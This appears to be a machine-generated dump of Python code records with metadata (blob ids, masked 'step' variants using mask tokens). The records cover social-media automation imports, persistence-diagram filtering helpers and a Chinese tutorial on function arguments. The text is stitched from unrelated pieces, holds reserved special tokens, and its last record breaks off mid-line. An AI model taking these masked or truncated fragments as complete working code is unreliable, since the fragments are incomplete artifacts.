[
5,
6,
7,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from .login import LoginTask
from .tag_search import TagSearchTask
from .timeline import TimelineTask
from .get_follower import GetFollowerTask
from .followback import FollowBackTask
from .unfollow import UnFollowTask
|
flexible
|
{
"blob_id": "e899b093152ee0923f1e5ad3b5719bbf9eb4339c",
"index": 7466,
"step-1": "<mask token>\n",
"step-2": "from .login import LoginTask\nfrom .tag_search import TagSearchTask\nfrom .timeline import TimelineTask\nfrom .get_follower import GetFollowerTask\nfrom .followback import FollowBackTask\nfrom .unfollow import UnFollowTask\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
# processing functions for diagrams
import torch
import numpy as np
def remove_filler(dgm, val=np.inf):
"""
remove filler rows from diagram
"""
inds = (dgm[:,0] != val)
return dgm[inds,:]
def remove_zero_bars(dgm):
"""
remove zero bars from diagram
"""
inds = dgm[:,0] != dgm[:,1]
return dgm[inds,:]
def remove_infinite_bars(dgm, issub):
"""
remove infinite bars from diagram
"""
if issub:
inds = dgm[:, 1] != np.inf
return dgm[inds,:]
else:
inds = dgm[:, 1] != -np.inf
return dgm[inds,:]
|
normal
|
{
"blob_id": "ac459bff6d4281ce07b70dbccde3243412ddb414",
"index": 3155,
"step-1": "<mask token>\n\n\ndef remove_zero_bars(dgm):\n \"\"\"\n remove zero bars from diagram\n \"\"\"\n inds = dgm[:, 0] != dgm[:, 1]\n return dgm[inds, :]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef remove_filler(dgm, val=np.inf):\n \"\"\"\n remove filler rows from diagram\n \"\"\"\n inds = dgm[:, 0] != val\n return dgm[inds, :]\n\n\ndef remove_zero_bars(dgm):\n \"\"\"\n remove zero bars from diagram\n \"\"\"\n inds = dgm[:, 0] != dgm[:, 1]\n return dgm[inds, :]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef remove_filler(dgm, val=np.inf):\n \"\"\"\n remove filler rows from diagram\n \"\"\"\n inds = dgm[:, 0] != val\n return dgm[inds, :]\n\n\ndef remove_zero_bars(dgm):\n \"\"\"\n remove zero bars from diagram\n \"\"\"\n inds = dgm[:, 0] != dgm[:, 1]\n return dgm[inds, :]\n\n\ndef remove_infinite_bars(dgm, issub):\n \"\"\"\n remove infinite bars from diagram\n \"\"\"\n if issub:\n inds = dgm[:, 1] != np.inf\n return dgm[inds, :]\n else:\n inds = dgm[:, 1] != -np.inf\n return dgm[inds, :]\n",
"step-4": "import torch\nimport numpy as np\n\n\ndef remove_filler(dgm, val=np.inf):\n \"\"\"\n remove filler rows from diagram\n \"\"\"\n inds = dgm[:, 0] != val\n return dgm[inds, :]\n\n\ndef remove_zero_bars(dgm):\n \"\"\"\n remove zero bars from diagram\n \"\"\"\n inds = dgm[:, 0] != dgm[:, 1]\n return dgm[inds, :]\n\n\ndef remove_infinite_bars(dgm, issub):\n \"\"\"\n remove infinite bars from diagram\n \"\"\"\n if issub:\n inds = dgm[:, 1] != np.inf\n return dgm[inds, :]\n else:\n inds = dgm[:, 1] != -np.inf\n return dgm[inds, :]\n",
"step-5": "# processing functions for diagrams\r\n\r\nimport torch\r\nimport numpy as np\r\n\r\ndef remove_filler(dgm, val=np.inf):\r\n \"\"\"\r\n remove filler rows from diagram\r\n \"\"\"\r\n inds = (dgm[:,0] != val)\r\n return dgm[inds,:]\r\n\r\n\r\ndef remove_zero_bars(dgm):\r\n \"\"\"\r\n remove zero bars from diagram\r\n \"\"\"\r\n inds = dgm[:,0] != dgm[:,1]\r\n return dgm[inds,:]\r\n\r\n\r\ndef remove_infinite_bars(dgm, issub):\r\n \"\"\"\r\n remove infinite bars from diagram\r\n \"\"\"\r\n if issub:\r\n inds = dgm[:, 1] != np.inf\r\n return dgm[inds,:]\r\n else:\r\n inds = dgm[:, 1] != -np.inf\r\n return dgm[inds,:]\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
<|reserved_special_token_0|>
def enroll(name, gender, age=6, city='Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
<|reserved_special_token_0|>
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
<|reserved_special_token_0|>
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
<|reserved_special_token_0|>
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
<|reserved_special_token_0|>
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
<|reserved_special_token_0|>
def quadratic(a, b, c):
if not isinstance(a, (int, float)):
raise TypeError('a is not a number')
if not isinstance(b, (int, float)):
raise TypeError('a is not a number')
if not isinstance(c, (int, float)):
raise TypeError('a is not a number')
d = b * b - 4 * a * c
if a == 0:
if b == 0:
if c == 0:
return '方程根为全体实数'
else:
return '方程无根'
else:
x1 = -c / b
x2 = x1
return x1, x2
elif d < 0:
return '方程无根'
else:
x1 = (-b + math.sqrt(d)) / 2 / a
x2 = (-b - math.sqrt(d)) / 2 / a
return x1, x2
<|reserved_special_token_0|>
def power(x):
return x * x
<|reserved_special_token_0|>
def powerThree(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
<|reserved_special_token_0|>
def enroll(name, gender, age=6, city='Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
<|reserved_special_token_0|>
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
<|reserved_special_token_0|>
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
<|reserved_special_token_0|>
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
<|reserved_special_token_0|>
def person(name, age, **kw):
if 'city' in kw:
pass
if 'job' in kw:
pass
print('name:', name, 'age:', age, 'other:', kw)
<|reserved_special_token_0|>
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
<|reserved_special_token_0|>
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
<|reserved_special_token_0|>
def quadratic(a, b, c):
if not isinstance(a, (int, float)):
raise TypeError('a is not a number')
if not isinstance(b, (int, float)):
raise TypeError('a is not a number')
if not isinstance(c, (int, float)):
raise TypeError('a is not a number')
d = b * b - 4 * a * c
if a == 0:
if b == 0:
if c == 0:
return '方程根为全体实数'
else:
return '方程无根'
else:
x1 = -c / b
x2 = x1
return x1, x2
elif d < 0:
return '方程无根'
else:
x1 = (-b + math.sqrt(d)) / 2 / a
x2 = (-b - math.sqrt(d)) / 2 / a
return x1, x2
<|reserved_special_token_0|>
def power(x):
return x * x
<|reserved_special_token_0|>
def powerThree(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
<|reserved_special_token_0|>
def enroll(name, gender, age=6, city='Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
<|reserved_special_token_0|>
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
<|reserved_special_token_0|>
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
<|reserved_special_token_0|>
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
<|reserved_special_token_0|>
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
<|reserved_special_token_0|>
def person(name, age, **kw):
if 'city' in kw:
pass
if 'job' in kw:
pass
print('name:', name, 'age:', age, 'other:', kw)
<|reserved_special_token_0|>
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
<|reserved_special_token_0|>
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print(abs(100))
print(abs(-20))
print(abs(12.34))
print(max(1, 2))
print(max(1, 2, 3, -5))
print(int('123'))
print(int(12.34))
print(float('12.34'))
print(str(1.23))
print(str(100))
print(bool(1))
print(bool(''))
a = abs
print(a(-1))
n1 = 255
n2 = 1000
print(hex(255))
print(hex(1000))
from abstest import my_abs
print(my_abs(-2))
<|reserved_special_token_0|>
import math
def move(x, y, step, angle=0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx, ny
x, y = move(100, 100, 60, math.pi / 6)
print(x, y)
r = move(100, 100, 60, math.pi / 6)
print(r)
def quadratic(a, b, c):
if not isinstance(a, (int, float)):
raise TypeError('a is not a number')
if not isinstance(b, (int, float)):
raise TypeError('a is not a number')
if not isinstance(c, (int, float)):
raise TypeError('a is not a number')
d = b * b - 4 * a * c
if a == 0:
if b == 0:
if c == 0:
return '方程根为全体实数'
else:
return '方程无根'
else:
x1 = -c / b
x2 = x1
return x1, x2
elif d < 0:
return '方程无根'
else:
x1 = (-b + math.sqrt(d)) / 2 / a
x2 = (-b - math.sqrt(d)) / 2 / a
return x1, x2
print(quadratic(2, 3, 1))
print(quadratic(0, 0, 0))
def power(x):
return x * x
print(power(4))
print(power(-2))
def powerThree(x, n=2):
s = 1
while n > 0:
n = n - 1
s = s * x
return s
print(powerThree(5, 3))
print(powerThree(5))
def enroll(name, gender, age=6, city='Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
print(enroll('Sarah', 'F'))
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
print(add_end([1, 2, 3]))
print(add_end())
print(add_end())
print(add_end())
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc([1, 2, 3]))
print(calc((1, 2, 3)))
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calcTwo(1, 2))
print(calcTwo())
numbers = [1, 2, 3]
print(calcTwo(numbers[0], numbers[1], numbers[2]))
print(calcTwo(*numbers))
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
person('michael', 30)
person('michael', 30, city='Beijing')
person('michael', 30, gender='m', job='engineer')
extra = {'city': 'Beijing', 'job': 'engineer'}
person('Jack', 24, city=extra['city'], job=extra['job'])
person('Jack', 24, **extra)
def person(name, age, **kw):
if 'city' in kw:
pass
if 'job' in kw:
pass
print('name:', name, 'age:', age, 'other:', kw)
person('jack', 24, city='beijing', addr='chaoyang', zipcode=123456)
def personTwo(name, age, *, city, job):
print(name, age, city, job)
personTwo('jack', 24, city='beijing', job='engineer')
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
personFour('jack', 24, job='engineer')
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
f1(1, 2)
f1(1, 2, 3)
f1(1, 2, 3, 'a', 'b')
f1(1, 2, 3, 'a', 'b', x=99)
f2(1, 2, d=99, ext=None)
args = 1, 2, 3, 4
kw = {'d': 99, 'x': '#'}
f1(*args, **kw)
args = 1, 2, 3
kw = {'d': 88, 'x': '#'}
f2(*args, **kw)
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/4/11 16:07
# @Author : LiuZhi
# @Site :
# @File : Function.py
# @Software: PyCharm
#求绝对值的函数
print(abs(100))
print(abs(-20))
print(abs(12.34))
#print(abs(1,2))
#print(abs('q'))
print(max(1,2))
print(max(1,2,3,-5))
print(int('123'))
print(int(12.34))
print(float('12.34'))
print(str(1.23))
print(str(100))
print(bool(1))
print(bool(''))
a = abs
print(a(-1))
n1 = 255
n2 = 1000
print(hex(255))
print(hex(1000))
from abstest import my_abs
print(my_abs(-2))
#print(my_abs(-2,3))
#print(my_abs('222'))
'''
pass用法
def nop():
pass
age = 26
if age >= 18:
pass
'''
import math
def move(x,y, step, angle = 0):
nx = x + step * math.cos(angle)
ny = y - step * math.sin(angle)
return nx,ny
x, y = move(100, 100, 60, math.pi/6)
print(x,y)
r = move(100, 100, 60, math.pi/6)
print(r)
#求一元二次方程的根
def quadratic(a, b, c):
if not isinstance(a, (int, float)):
raise TypeError('a is not a number')
if not isinstance(b, (int, float)):
raise TypeError('a is not a number')
if not isinstance(c, (int, float)):
raise TypeError('a is not a number')
d = b*b - 4*a*c
if a == 0:
if b == 0:
if c == 0:
return '方程根为全体实数'
else:
return '方程无根'
else:
x1 = -c/b
x2 = x1
return x1, x2
else:
if d<0:
return '方程无根'
else:
x1 = (-b + math.sqrt(d))/2/a
x2 = (-b - math.sqrt(d))/2/a
return x1,x2
print(quadratic(2, 3, 1))
print(quadratic(0,0,0))
def power(x):
return x*x
print(power(4))
print(power(-2))
#默认参数
def powerThree(x, n=2):
s = 1
while n >0 :
n = n - 1
s = s * x
return s
print(powerThree(5,3))
print(powerThree(5))
def enroll(name, gender, age = 6, city = 'Beijing'):
print('name:', name)
print('gender', gender)
print('age', age)
print('city', city)
print(enroll('Sarah', 'F'))
def add_end(l=None):
if l is None:
l = []
l.append('END')
return l
print(add_end([1, 2, 3]))
print(add_end())
print(add_end())
print(add_end())
#可变参数
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc([1, 2, 3]))
print(calc((1, 2, 3)))
def calcTwo(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calcTwo(1,2))
print(calcTwo())
numbers = [1, 2, 3]
print(calcTwo(numbers[0], numbers[1], numbers[2]))
print(calcTwo(*numbers))
#关键字参数
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
person('michael', 30)
person('michael', 30, city='Beijing')
person('michael', 30, gender='m', job='engineer')
extra = {'city':'Beijing', 'job': 'engineer'}
person('Jack', 24, city = extra['city'], job = extra['job'])
person('Jack', 24, **extra)
def person(name, age, **kw):
if 'city' in kw:
pass
if 'job' in kw:
pass
print('name:', name, 'age:', age, 'other:', kw)
person('jack', 24, city='beijing', addr = 'chaoyang', zipcode=123456)
def personTwo(name, age, *, city, job):
print(name, age, city, job)
personTwo('jack', 24, city='beijing', job='engineer')
def personThree(name, age, *args, city, job):
print(name, age, args, city, job)
#personThree('jack', 24, 'beijing', 'engineer')
def personFour(name, age, *, city='beijing', job):
print(name, age, city, job)
personFour('jack', 24, job = 'engineer')
def personFive(name, age, city, job):
pass
def f1(a, b, c=0, *args, **kw):
print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)
def f2(a, b, c=0, *, d, **kw):
print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)
f1(1, 2)
f1(1, 2, 3)
f1(1, 2, 3, 'a', 'b')
f1(1, 2, 3, 'a', 'b', x=99)
f2(1, 2, d=99, ext=None)
args = (1,2, 3, 4)
kw = {'d':99,'x':'#'}
f1(*args, **kw)
args = (1,2, 3)
kw = {'d':88, 'x':'#'}
f2(*args, **kw)
|
flexible
|
{
"blob_id": "8a6eb2eb746e3b9de92998b70ddff2a39cb1f269",
"index": 6374,
"step-1": "<mask token>\n\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n\n<mask token>\n\n\ndef enroll(name, gender, age=6, city='Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\n\n\n<mask token>\n\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\n\n\n<mask token>\n\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\n<mask token>\n\n\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n\n\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\n\n\n<mask token>\n\n\ndef personFive(name, age, city, job):\n pass\n\n\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n\n<mask token>\n\n\ndef quadratic(a, b, c):\n if not isinstance(a, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(b, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(c, (int, float)):\n raise TypeError('a is not a number')\n d = b * b - 4 * a * c\n if a == 0:\n if b == 0:\n if c == 0:\n return '方程根为全体实数'\n else:\n return '方程无根'\n else:\n x1 = -c / b\n x2 = x1\n return x1, x2\n elif d < 0:\n return '方程无根'\n else:\n x1 = (-b + math.sqrt(d)) / 2 / a\n x2 = (-b - math.sqrt(d)) / 2 / a\n return x1, x2\n\n\n<mask token>\n\n\ndef power(x):\n return x * x\n\n\n<mask token>\n\n\ndef powerThree(x, n=2):\n s = 1\n while n > 0:\n n = n - 1\n s = s * x\n return s\n\n\n<mask token>\n\n\ndef enroll(name, gender, age=6, city='Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\n\n\n<mask token>\n\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\n\n\n<mask token>\n\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\n<mask token>\n\n\ndef person(name, age, **kw):\n print('name:', name, 'age:', age, 'other:', kw)\n\n\n<mask token>\n\n\ndef person(name, age, **kw):\n if 'city' in kw:\n pass\n if 'job' in kw:\n pass\n print('name:', name, 'age:', age, 'other:', kw)\n\n\n<mask token>\n\n\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n\n\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\n\n\n<mask token>\n\n\ndef personFive(name, age, city, job):\n pass\n\n\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n\n<mask token>\n\n\ndef quadratic(a, b, c):\n if not isinstance(a, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(b, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(c, (int, float)):\n raise TypeError('a is not a number')\n d = b * b - 4 * a * c\n if a == 0:\n if b == 0:\n if c == 0:\n return '方程根为全体实数'\n else:\n return '方程无根'\n else:\n x1 = -c / b\n x2 = x1\n return x1, x2\n elif d < 0:\n return '方程无根'\n else:\n x1 = (-b + math.sqrt(d)) / 2 / a\n x2 = (-b - math.sqrt(d)) / 2 / a\n return x1, x2\n\n\n<mask token>\n\n\ndef power(x):\n return x * x\n\n\n<mask token>\n\n\ndef powerThree(x, n=2):\n s = 1\n while n > 0:\n n = n - 1\n s = s * x\n return s\n\n\n<mask token>\n\n\ndef enroll(name, gender, age=6, city='Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\n\n\n<mask token>\n\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\n\n\n<mask token>\n\n\ndef calc(numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\n<mask token>\n\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\n<mask token>\n\n\ndef person(name, age, **kw):\n print('name:', name, 'age:', age, 'other:', kw)\n\n\n<mask token>\n\n\ndef person(name, age, **kw):\n if 'city' in kw:\n pass\n if 'job' in kw:\n pass\n print('name:', name, 'age:', age, 'other:', kw)\n\n\n<mask token>\n\n\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n\n\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\n\n\n<mask token>\n\n\ndef personFive(name, age, city, job):\n pass\n\n\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\n<mask token>\n",
"step-4": "print(abs(100))\nprint(abs(-20))\nprint(abs(12.34))\nprint(max(1, 2))\nprint(max(1, 2, 3, -5))\nprint(int('123'))\nprint(int(12.34))\nprint(float('12.34'))\nprint(str(1.23))\nprint(str(100))\nprint(bool(1))\nprint(bool(''))\na = abs\nprint(a(-1))\nn1 = 255\nn2 = 1000\nprint(hex(255))\nprint(hex(1000))\nfrom abstest import my_abs\nprint(my_abs(-2))\n<mask token>\nimport math\n\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n\nx, y = move(100, 100, 60, math.pi / 6)\nprint(x, y)\nr = move(100, 100, 60, math.pi / 6)\nprint(r)\n\n\ndef quadratic(a, b, c):\n if not isinstance(a, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(b, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(c, (int, float)):\n raise TypeError('a is not a number')\n d = b * b - 4 * a * c\n if a == 0:\n if b == 0:\n if c == 0:\n return '方程根为全体实数'\n else:\n return '方程无根'\n else:\n x1 = -c / b\n x2 = x1\n return x1, x2\n elif d < 0:\n return '方程无根'\n else:\n x1 = (-b + math.sqrt(d)) / 2 / a\n x2 = (-b - math.sqrt(d)) / 2 / a\n return x1, x2\n\n\nprint(quadratic(2, 3, 1))\nprint(quadratic(0, 0, 0))\n\n\ndef power(x):\n return x * x\n\n\nprint(power(4))\nprint(power(-2))\n\n\ndef powerThree(x, n=2):\n s = 1\n while n > 0:\n n = n - 1\n s = s * x\n return s\n\n\nprint(powerThree(5, 3))\nprint(powerThree(5))\n\n\ndef enroll(name, gender, age=6, city='Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\n\n\nprint(enroll('Sarah', 'F'))\n\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\n\n\nprint(add_end([1, 2, 3]))\nprint(add_end())\nprint(add_end())\nprint(add_end())\n\n\ndef calc(numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\nprint(calc([1, 2, 3]))\nprint(calc((1, 2, 3)))\n\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\n\nprint(calcTwo(1, 2))\nprint(calcTwo())\nnumbers = [1, 2, 3]\nprint(calcTwo(numbers[0], numbers[1], numbers[2]))\nprint(calcTwo(*numbers))\n\n\ndef person(name, age, **kw):\n print('name:', name, 'age:', age, 'other:', kw)\n\n\nperson('michael', 30)\nperson('michael', 30, city='Beijing')\nperson('michael', 30, gender='m', job='engineer')\nextra = {'city': 'Beijing', 'job': 'engineer'}\nperson('Jack', 24, city=extra['city'], job=extra['job'])\nperson('Jack', 24, **extra)\n\n\ndef person(name, age, **kw):\n if 'city' in kw:\n pass\n if 'job' in kw:\n pass\n print('name:', name, 'age:', age, 'other:', kw)\n\n\nperson('jack', 24, city='beijing', addr='chaoyang', zipcode=123456)\n\n\ndef personTwo(name, age, *, city, job):\n print(name, age, city, job)\n\n\npersonTwo('jack', 24, city='beijing', job='engineer')\n\n\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n\n\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\n\n\npersonFour('jack', 24, job='engineer')\n\n\ndef personFive(name, age, city, job):\n pass\n\n\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\n\n\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\n\n\nf1(1, 2)\nf1(1, 2, 3)\nf1(1, 2, 3, 'a', 'b')\nf1(1, 2, 3, 'a', 'b', x=99)\nf2(1, 2, d=99, ext=None)\nargs = 1, 2, 3, 4\nkw = {'d': 99, 'x': '#'}\nf1(*args, **kw)\nargs = 1, 2, 3\nkw = {'d': 88, 'x': '#'}\nf2(*args, **kw)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/4/11 16:07\n# @Author : LiuZhi\n# @Site : \n# @File : Function.py\n# @Software: PyCharm\n\n#求绝对值的函数\nprint(abs(100))\nprint(abs(-20))\nprint(abs(12.34))\n\n#print(abs(1,2))\n#print(abs('q'))\n\nprint(max(1,2))\nprint(max(1,2,3,-5))\n\nprint(int('123'))\nprint(int(12.34))\nprint(float('12.34'))\nprint(str(1.23))\nprint(str(100))\nprint(bool(1))\nprint(bool(''))\n\na = abs\nprint(a(-1))\n\nn1 = 255\nn2 = 1000\nprint(hex(255))\nprint(hex(1000))\n\n\nfrom abstest import my_abs\nprint(my_abs(-2))\n#print(my_abs(-2,3))\n#print(my_abs('222'))\n'''\npass用法\ndef nop():\n pass\n\nage = 26\nif age >= 18:\n pass\n'''\nimport math\n\ndef move(x,y, step, angle = 0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx,ny\nx, y = move(100, 100, 60, math.pi/6)\nprint(x,y)\nr = move(100, 100, 60, math.pi/6)\nprint(r)\n\n#求一元二次方程的根\ndef quadratic(a, b, c):\n if not isinstance(a, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(b, (int, float)):\n raise TypeError('a is not a number')\n if not isinstance(c, (int, float)):\n raise TypeError('a is not a number')\n d = b*b - 4*a*c\n if a == 0:\n if b == 0:\n if c == 0:\n return '方程根为全体实数'\n else:\n return '方程无根'\n else:\n x1 = -c/b\n x2 = x1\n return x1, x2\n else:\n if d<0:\n return '方程无根'\n else:\n x1 = (-b + math.sqrt(d))/2/a\n x2 = (-b - math.sqrt(d))/2/a\n return x1,x2\nprint(quadratic(2, 3, 1))\nprint(quadratic(0,0,0))\n\ndef power(x):\n return x*x\n\nprint(power(4))\nprint(power(-2))\n\n#默认参数\ndef powerThree(x, n=2):\n s = 1\n while n >0 :\n n = n - 1\n s = s * x\n return s\n\nprint(powerThree(5,3))\nprint(powerThree(5))\n\ndef enroll(name, gender, age = 6, city = 'Beijing'):\n print('name:', name)\n print('gender', gender)\n print('age', age)\n print('city', city)\nprint(enroll('Sarah', 'F'))\n\ndef add_end(l=None):\n if l is None:\n l = []\n l.append('END')\n return l\nprint(add_end([1, 2, 3]))\nprint(add_end())\nprint(add_end())\nprint(add_end())\n\n#可变参数\ndef calc(numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\nprint(calc([1, 2, 3]))\nprint(calc((1, 2, 3)))\n\ndef calcTwo(*numbers):\n sum = 0\n for n in numbers:\n sum = sum + n * n\n return sum\n\nprint(calcTwo(1,2))\nprint(calcTwo())\nnumbers = [1, 2, 3]\nprint(calcTwo(numbers[0], numbers[1], numbers[2]))\nprint(calcTwo(*numbers))\n\n#关键字参数\ndef person(name, age, **kw):\n print('name:', name, 'age:', age, 'other:', kw)\n\nperson('michael', 30)\nperson('michael', 30, city='Beijing')\nperson('michael', 30, gender='m', job='engineer')\nextra = {'city':'Beijing', 'job': 'engineer'}\nperson('Jack', 24, city = extra['city'], job = extra['job'])\nperson('Jack', 24, **extra)\n\ndef person(name, age, **kw):\n if 'city' in kw:\n pass\n if 'job' in kw:\n pass\n print('name:', name, 'age:', age, 'other:', kw)\n\nperson('jack', 24, city='beijing', addr = 'chaoyang', zipcode=123456)\ndef personTwo(name, age, *, city, job):\n print(name, age, city, job)\npersonTwo('jack', 24, city='beijing', job='engineer')\ndef personThree(name, age, *args, city, job):\n print(name, age, args, city, job)\n#personThree('jack', 24, 'beijing', 'engineer')\ndef personFour(name, age, *, city='beijing', job):\n print(name, age, city, job)\npersonFour('jack', 24, job = 'engineer')\ndef personFive(name, age, city, job):\n pass\ndef f1(a, b, c=0, *args, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'args=', args, 'kw=', kw)\ndef f2(a, b, c=0, *, d, **kw):\n print('a=', a, 'b=', b, 'c=', c, 'd=', d, 'kw=', kw)\nf1(1, 2)\nf1(1, 2, 3)\nf1(1, 2, 3, 'a', 'b')\nf1(1, 2, 3, 'a', 'b', x=99)\nf2(1, 2, d=99, ext=None)\n\nargs = (1,2, 3, 4)\nkw = {'d':99,'x':'#'}\nf1(*args, **kw)\n\nargs = (1,2, 